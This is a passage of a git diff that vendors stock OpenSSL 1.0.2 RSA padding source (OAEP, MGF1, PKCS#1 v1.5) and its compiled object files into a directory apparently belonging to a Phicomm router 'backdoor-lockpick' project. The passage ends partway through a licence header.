+    return RSA_padding_add_PKCS1_OAEP_mgf1(to, tlen, from, flen,
+                                           param, plen, NULL, NULL);
+}
+
+int RSA_padding_add_PKCS1_OAEP_mgf1(unsigned char *to, int tlen,
+                                    const unsigned char *from, int flen,
+                                    const unsigned char *param, int plen,
+                                    const EVP_MD *md, const EVP_MD *mgf1md)
+{
+    int i, emlen = tlen - 1;
+    unsigned char *db, *seed;
+    unsigned char *dbmask, seedmask[EVP_MAX_MD_SIZE];
+    int mdlen;
+
+    if (md == NULL)
+        md = EVP_sha1();
+    if (mgf1md == NULL)
+        mgf1md = md;
+
+    mdlen = EVP_MD_size(md);
+
+    if (flen > emlen - 2 * mdlen - 1) {
+        RSAerr(RSA_F_RSA_PADDING_ADD_PKCS1_OAEP_MGF1,
+               RSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE);
+        return 0;
+    }
+
+    if (emlen < 2 * mdlen + 1) {
+        RSAerr(RSA_F_RSA_PADDING_ADD_PKCS1_OAEP_MGF1,
+               RSA_R_KEY_SIZE_TOO_SMALL);
+        return 0;
+    }
+
+    to[0] = 0;
+    seed = to + 1;
+    db = to + mdlen + 1;
+
+    if (!EVP_Digest((void *)param, plen, db, NULL, md, NULL))
+        return 0;
+    memset(db + mdlen, 0, emlen - flen - 2 * mdlen - 1);
+    db[emlen - flen - mdlen - 1] = 0x01;
+    memcpy(db + emlen - flen - mdlen, from, (unsigned int)flen);
+    if (RAND_bytes(seed, mdlen) <= 0)
+        return 0;
+# ifdef PKCS_TESTVECT
+    memcpy(seed,
+           "\xaa\xfd\x12\xf6\x59\xca\xe6\x34\x89\xb4\x79\xe5\x07\x6d\xde\xc2\xf0\x6c\xb5\x8f",
+           20);
+# endif
+
+    dbmask = OPENSSL_malloc(emlen - mdlen);
+    if (dbmask == NULL) {
+        RSAerr(RSA_F_RSA_PADDING_ADD_PKCS1_OAEP_MGF1, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    if (PKCS1_MGF1(dbmask, emlen - mdlen, seed, mdlen, mgf1md) < 0)
+        return 0;
+    for (i = 0; i < emlen - mdlen; i++)
+        db[i] ^= dbmask[i];
+
+    if (PKCS1_MGF1(seedmask, mdlen, db, emlen - mdlen, mgf1md) < 0)
+        return 0;
+    for (i = 0; i < mdlen; i++)
+        seed[i] ^= seedmask[i];
+
+    OPENSSL_free(dbmask);
+    return 1;
+}
+
+int RSA_padding_check_PKCS1_OAEP(unsigned char *to, int tlen,
+                                 const unsigned char *from, int flen, int num,
+                                 const unsigned char *param, int plen)
+{
+    return RSA_padding_check_PKCS1_OAEP_mgf1(to, tlen, from, flen, num,
+                                             param, plen, NULL, NULL);
+}
+
+int RSA_padding_check_PKCS1_OAEP_mgf1(unsigned char *to, int tlen,
+                                      const unsigned char *from, int flen,
+                                      int num, const unsigned char *param,
+                                      int plen, const EVP_MD *md,
+                                      const EVP_MD *mgf1md)
+{
+    int i, dblen, mlen = -1, one_index = 0, msg_index;
+    unsigned int good, found_one_byte;
+    const unsigned char *maskedseed, *maskeddb;
+    /*
+     * |em| is the encoded message, zero-padded to exactly |num| bytes: em =
+     * Y || maskedSeed || maskedDB
+     */
+    unsigned char *db = NULL, *em = NULL, seed[EVP_MAX_MD_SIZE],
+        phash[EVP_MAX_MD_SIZE];
+    int mdlen;
+
+    if (md == NULL)
+        md = EVP_sha1();
+    if (mgf1md == NULL)
+        mgf1md = md;
+
+    mdlen = EVP_MD_size(md);
+
+    if (tlen <= 0 || flen <= 0)
+        return -1;
+    /*
+     * |num| is the length of the modulus; |flen| is the length of the
+     * encoded message. Therefore, for any |from| that was obtained by
+     * decrypting a ciphertext, we must have |flen| <= |num|. Similarly,
+     * num < 2 * mdlen + 2 must hold for the modulus irrespective of
+     * the ciphertext, see PKCS #1 v2.2, section 7.1.2.
+     * This does not leak any side-channel information.
+     */
+    if (num < flen || num < 2 * mdlen + 2)
+        goto decoding_err;
+
+    dblen = num - mdlen - 1;
+    db = OPENSSL_malloc(dblen);
+    em = OPENSSL_malloc(num);
+    if (db == NULL || em == NULL) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_PKCS1_OAEP_MGF1, ERR_R_MALLOC_FAILURE);
+        goto cleanup;
+    }
+
+    /*
+     * Always do this zero-padding copy (even when num == flen) to avoid
+     * leaking that information. The copy still leaks some side-channel
+     * information, but it's impossible to have a fixed  memory access
+     * pattern since we can't read out of the bounds of |from|.
+     *
+     * TODO(emilia): Consider porting BN_bn2bin_padded from BoringSSL.
+     */
+    memset(em, 0, num);
+    memcpy(em + num - flen, from, flen);
+
+    /*
+     * The first byte must be zero, however we must not leak if this is
+     * true. See James H. Manger, "A Chosen Ciphertext  Attack on RSA
+     * Optimal Asymmetric Encryption Padding (OAEP) [...]", CRYPTO 2001).
+     */
+    good = constant_time_is_zero(em[0]);
+
+    maskedseed = em + 1;
+    maskeddb = em + 1 + mdlen;
+
+    if (PKCS1_MGF1(seed, mdlen, maskeddb, dblen, mgf1md))
+        goto cleanup;
+    for (i = 0; i < mdlen; i++)
+        seed[i] ^= maskedseed[i];
+
+    if (PKCS1_MGF1(db, dblen, seed, mdlen, mgf1md))
+        goto cleanup;
+    for (i = 0; i < dblen; i++)
+        db[i] ^= maskeddb[i];
+
+    if (!EVP_Digest((void *)param, plen, phash, NULL, md, NULL))
+        goto cleanup;
+
+    good &= constant_time_is_zero(CRYPTO_memcmp(db, phash, mdlen));
+
+    found_one_byte = 0;
+    for (i = mdlen; i < dblen; i++) {
+        /*
+         * Padding consists of a number of 0-bytes, followed by a 1.
+         */
+        unsigned int equals1 = constant_time_eq(db[i], 1);
+        unsigned int equals0 = constant_time_is_zero(db[i]);
+        one_index = constant_time_select_int(~found_one_byte & equals1,
+                                             i, one_index);
+        found_one_byte |= equals1;
+        good &= (found_one_byte | equals0);
+    }
+
+    good &= found_one_byte;
+
+    /*
+     * At this point |good| is zero unless the plaintext was valid,
+     * so plaintext-awareness ensures timing side-channels are no longer a
+     * concern.
+     */
+    if (!good)
+        goto decoding_err;
+
+    msg_index = one_index + 1;
+    mlen = dblen - msg_index;
+
+    if (tlen < mlen) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_PKCS1_OAEP_MGF1, RSA_R_DATA_TOO_LARGE);
+        mlen = -1;
+    } else {
+        memcpy(to, db + msg_index, mlen);
+        goto cleanup;
+    }
+
+ decoding_err:
+    /*
+     * To avoid chosen ciphertext attacks, the error message should not
+     * reveal which kind of decoding error happened.
+     */
+    RSAerr(RSA_F_RSA_PADDING_CHECK_PKCS1_OAEP_MGF1,
+           RSA_R_OAEP_DECODING_ERROR);
+ cleanup:
+    if (db != NULL)
+        OPENSSL_free(db);
+    if (em != NULL)
+        OPENSSL_free(em);
+    return mlen;
+}
+
+int PKCS1_MGF1(unsigned char *mask, long len,
+               const unsigned char *seed, long seedlen, const EVP_MD *dgst)
+{
+    long i, outlen = 0;
+    unsigned char cnt[4];
+    EVP_MD_CTX c;
+    unsigned char md[EVP_MAX_MD_SIZE];
+    int mdlen;
+    int rv = -1;
+
+    EVP_MD_CTX_init(&c);
+    mdlen = EVP_MD_size(dgst);
+    if (mdlen < 0)
+        goto err;
+    for (i = 0; outlen < len; i++) {
+        cnt[0] = (unsigned char)((i >> 24) & 255);
+        cnt[1] = (unsigned char)((i >> 16) & 255);
+        cnt[2] = (unsigned char)((i >> 8)) & 255;
+        cnt[3] = (unsigned char)(i & 255);
+        if (!EVP_DigestInit_ex(&c, dgst, NULL)
+            || !EVP_DigestUpdate(&c, seed, seedlen)
+            || !EVP_DigestUpdate(&c, cnt, 4))
+            goto err;
+        if (outlen + mdlen <= len) {
+            if (!EVP_DigestFinal_ex(&c, mask + outlen, NULL))
+                goto err;
+            outlen += mdlen;
+        } else {
+            if (!EVP_DigestFinal_ex(&c, md, NULL))
+                goto err;
+            memcpy(mask + outlen, md, len - outlen);
+            outlen = len;
+        }
+    }
+    rv = 0;
+ err:
+    EVP_MD_CTX_cleanup(&c);
+    return rv;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_oaep.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_oaep.o
new file mode 100644
index 0000000000000000000000000000000000000000..8b054e2fc885166f7bff33f6e84506fa578e6093
GIT binary patch
literal 5328
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
ZeXqd(f+fLkWij~)+y56(nLvf|{{@?sycGZd

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pk1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pk1.c
new file mode 100644
index 0000000..efa1fd3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pk1.c
@@ -0,0 +1,275 @@
+/* crypto/rsa/rsa_pk1.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "constant_time_locl.h"
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+#include <openssl/rand.h>
+
+int RSA_padding_add_PKCS1_type_1(unsigned char *to, int tlen,
+                                 const unsigned char *from, int flen)
+{
+    int j;
+    unsigned char *p;
+
+    if (flen > (tlen - RSA_PKCS1_PADDING_SIZE)) {
+        RSAerr(RSA_F_RSA_PADDING_ADD_PKCS1_TYPE_1,
+               RSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE);
+        return (0);
+    }
+
+    p = (unsigned char *)to;
+
+    *(p++) = 0;
+    *(p++) = 1;                 /* Private Key BT (Block Type) */
+
+    /* pad out with 0xff data */
+    j = tlen - 3 - flen;
+    memset(p, 0xff, j);
+    p += j;
+    *(p++) = '\0';
+    memcpy(p, from, (unsigned int)flen);
+    return (1);
+}
+
+int RSA_padding_check_PKCS1_type_1(unsigned char *to, int tlen,
+                                   const unsigned char *from, int flen,
+                                   int num)
+{
+    int i, j;
+    const unsigned char *p;
+
+    p = from;
+    if ((num != (flen + 1)) || (*(p++) != 01)) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_1,
+               RSA_R_BLOCK_TYPE_IS_NOT_01);
+        return (-1);
+    }
+
+    /* scan over padding data */
+    j = flen - 1;               /* one for type. */
+    for (i = 0; i < j; i++) {
+        if (*p != 0xff) {       /* should decrypt to 0xff */
+            if (*p == 0) {
+                p++;
+                break;
+            } else {
+                RSAerr(RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_1,
+                       RSA_R_BAD_FIXED_HEADER_DECRYPT);
+                return (-1);
+            }
+        }
+        p++;
+    }
+
+    if (i == j) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_1,
+               RSA_R_NULL_BEFORE_BLOCK_MISSING);
+        return (-1);
+    }
+
+    if (i < 8) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_1,
+               RSA_R_BAD_PAD_BYTE_COUNT);
+        return (-1);
+    }
+    i++;                        /* Skip over the '\0' */
+    j -= i;
+    if (j > tlen) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_1, RSA_R_DATA_TOO_LARGE);
+        return (-1);
+    }
+    memcpy(to, p, (unsigned int)j);
+
+    return (j);
+}
+
+int RSA_padding_add_PKCS1_type_2(unsigned char *to, int tlen,
+                                 const unsigned char *from, int flen)
+{
+    int i, j;
+    unsigned char *p;
+
+    if (flen > (tlen - 11)) {
+        RSAerr(RSA_F_RSA_PADDING_ADD_PKCS1_TYPE_2,
+               RSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE);
+        return (0);
+    }
+
+    p = (unsigned char *)to;
+
+    *(p++) = 0;
+    *(p++) = 2;                 /* Public Key BT (Block Type) */
+
+    /* pad out with non-zero random data */
+    j = tlen - 3 - flen;
+
+    if (RAND_bytes(p, j) <= 0)
+        return (0);
+    for (i = 0; i < j; i++) {
+        if (*p == '\0')
+            do {
+                if (RAND_bytes(p, 1) <= 0)
+                    return (0);
+            } while (*p == '\0');
+        p++;
+    }
+
+    *(p++) = '\0';
+
+    memcpy(p, from, (unsigned int)flen);
+    return (1);
+}
+
+int RSA_padding_check_PKCS1_type_2(unsigned char *to, int tlen,
+                                   const unsigned char *from, int flen,
+                                   int num)
+{
+    int i;
+    /* |em| is the encoded message, zero-padded to exactly |num| bytes */
+    unsigned char *em = NULL;
+    unsigned int good, found_zero_byte;
+    int zero_index = 0, msg_index, mlen = -1;
+
+    if (tlen < 0 || flen < 0)
+        return -1;
+
+    /*
+     * PKCS#1 v1.5 decryption. See "PKCS #1 v2.2: RSA Cryptography Standard",
+     * section 7.2.2.
+     */
+
+    if (flen > num)
+        goto err;
+
+    if (num < 11)
+        goto err;
+
+    em = OPENSSL_malloc(num);
+    if (em == NULL) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_2, ERR_R_MALLOC_FAILURE);
+        return -1;
+    }
+    memset(em, 0, num);
+    /*
+     * Always do this zero-padding copy (even when num == flen) to avoid
+     * leaking that information. The copy still leaks some side-channel
+     * information, but it's impossible to have a fixed  memory access
+     * pattern since we can't read out of the bounds of |from|.
+     *
+     * TODO(emilia): Consider porting BN_bn2bin_padded from BoringSSL.
+     */
+    memcpy(em + num - flen, from, flen);
+
+    good = constant_time_is_zero(em[0]);
+    good &= constant_time_eq(em[1], 2);
+
+    found_zero_byte = 0;
+    for (i = 2; i < num; i++) {
+        unsigned int equals0 = constant_time_is_zero(em[i]);
+        zero_index =
+            constant_time_select_int(~found_zero_byte & equals0, i,
+                                     zero_index);
+        found_zero_byte |= equals0;
+    }
+
+    /*
+     * PS must be at least 8 bytes long, and it starts two bytes into |em|.
+     * If we never found a 0-byte, then |zero_index| is 0 and the check
+     * also fails.
+     */
+    good &= constant_time_ge((unsigned int)(zero_index), 2 + 8);
+
+    /*
+     * Skip the zero byte. This is incorrect if we never found a zero-byte
+     * but in this case we also do not copy the message out.
+     */
+    msg_index = zero_index + 1;
+    mlen = num - msg_index;
+
+    /*
+     * For good measure, do this check in constant time as well; it could
+     * leak something if |tlen| was assuming valid padding.
+     */
+    good &= constant_time_ge((unsigned int)(tlen), (unsigned int)(mlen));
+
+    /*
+     * We can't continue in constant-time because we need to copy the result
+     * and we cannot fake its length. This unavoidably leaks timing
+     * information at the API boundary.
+     * TODO(emilia): this could be addressed at the call site,
+     * see BoringSSL commit 0aa0767340baf925bda4804882aab0cb974b2d26.
+     */
+    if (!good) {
+        mlen = -1;
+        goto err;
+    }
+
+    memcpy(to, em + msg_index, mlen);
+
+ err:
+    if (em != NULL)
+        OPENSSL_free(em);
+    if (mlen == -1)
+        RSAerr(RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_2,
+               RSA_R_PKCS_DECODING_ERROR);
+    return mlen;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pk1.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pk1.o
new file mode 100644
index 0000000000000000000000000000000000000000..4b9f444cbfe06b71efbc5015fb9073ed2cee1ae3
GIT binary patch
literal 3168
zcmbVOU2IfE6rQ_V=nrsP!6*>}+nAWH%Gz5|Sum!v-L|)31O0`7;AOjPLFv!By_--a
zZIh*hAuRf2Of-RqKJnxe8XoFytL;*hKhaiS#1|qik<v9St>E>XyEArsyAb0^=FXgN
zzVFP;IkS`PtM=8{B#8)<$eU!r6DT1!3l_$e=CG2;WEDvlub*dAD*G{3KjR+nTVH>n
z6K1QGxN>o*9Y$Z}!RI#=DDgcblqF;8Lp8R`);5+;B$ia!gx48Y1If>g^f@m}sIgjU
zG@qz!>`UB5dT<06h*60)c-`^Hniw^di~U=qIyT2<)mT{4*P3fxco*2IohP5_pEn{a
zRAbagxD!XGQfpv%?7IF;hSY{6C9*Q(y@%d&(YgFS4je>awUKZp-S>OfXGk4@4Ta#d
zaFA%yNaeGHk6lR*?#b-0W`^#hEws6%$(`(5mr-IKhETqsOuazapLlYc8q;ib><1dX
zV^`TP?7M1ZhC09XvRh`V2I74VC7yb12y+1Q9PCZ?ZzcNgsxd;1(Q5atqf?`H0v@~V
zV}AgRr|hkLbT8dU-!`{KcZr?RhJl&l6EzT$vMU1@i%)EYp_h%&=>4MJLa#ePi_eVq
z@>HCGg;Ou9>>+Fz_UUC~7cS#oVz0tCQ_ni6)<8VM^F#q2!i+AQ_V&-<LM7QxUbrEF
z@6+e%0%Kk_hnsZ{Ly~;bIMhEqNKZn2i_a_3DO+s2QG7nmhK=Ox_0p?sddLPbU^ren
zti;*1#M}lTzM)VyOqFS<Et@y4!1O$9aCRawzrkBNK?|>zPAK=?>Ao9qC)sFprYJgH
zR5%?ANy@M@?PWKC=bW6qu1uDW!`_r%3zJm&nkF7>ptCpVzzw}b4a}&4ODenTlP;$R
zQ}*a31FCISA^MjQDY!lHw_yOdhfRuPQ*9*N?bkww6<2_e+N!E8j<S~4NT(igxLvQf
z$~P*nM@(1gttfYuZ*pc}f<KQEXv?70Zf_xQ-Z)}*XlPGnIwHN_NTeer(z=!T1s_4-
z5Pz1>`LS=1OZLhICccT|XR)u7OKcy@1)E{$Lm%u@`~ZI1=8@ON>>k;1Dv!!#$CpvL
zJi6R=OfI9c1ExH3i3dUw73e2W1J(s=lN!0?L)4x|Z7k0tmz_fG@#R$B9L@L0mG(wS
z-drV@LsVd7g)(F0`e4{Ra?i*$XV3W}VU9$W7OU)LRu^OF+088H!t<AcCLa!;!|bGR
z3A(~Wu!>8~PL?kLvF59@&SlmRu#M1g&T3Tv<iZ;O$2dZNmJ3517f-ucbHHNIa>e<C
z^FPBvfSGlM{tIZi_}@GNCkwv<m#?avG&WH!<UerWoz8<AbXxtkswPF#dqP1?AzH0(
zhll#K9W^yg)y-Nn_4ukaQr+07g(A8Z42QeIivk1=1p|i{hj>i<3erfod$racJ=p#D
zFcqY#ad&<54z0uA-rf}uURyXAgkzfaJn!+hxeD3?BV%_TfjfB~t^9^89P=vTv^@g9
z$8mfI@zx3cOcsB27XCC6!K~}v$->vbyolpKG8j&Cis|EffhKT&#wGQ<7r3}zr!2U*
zN5s|L)1muYq1VHi{*V}jgYABo9z3EG*8#uoC$84+ZsH1ep@VeAr4U!3tD_^>36#z*
zJ?Mfba$~pd4;<$H!On;)6z&QI!+H-$F<|hJ))w}6{98G`vH#gQK!>Te{(>t3Lt9~a
zf_Panlki;!4Qo*eE!)cYlQYRdd_PbtUYxZY$9spkWf`)~3UI!4{g(j8m{$6K)hnRI
zm=(~nP3ViVK^TkmMPJFWatp78Z|Fq}E_9-=<9Z8?^ji<a2|_3MyJ3K-&c53?C-e?<
zvP|S(K=_viV_NlR`TAD{k@r?T{s+!ge^KcDT!;0?-?z|<`sZ33B_Rw7c9S1?C5$nK
iRgW=qrK+A^=xZ>aZPxrf0h77(`}sm2WQ$>J)&B!m$yts7

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pmeth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pmeth.c
new file mode 100644
index 0000000..ddda0dd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pmeth.c
@@ -0,0 +1,778 @@
+/* crypto/rsa/rsa_pmeth.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
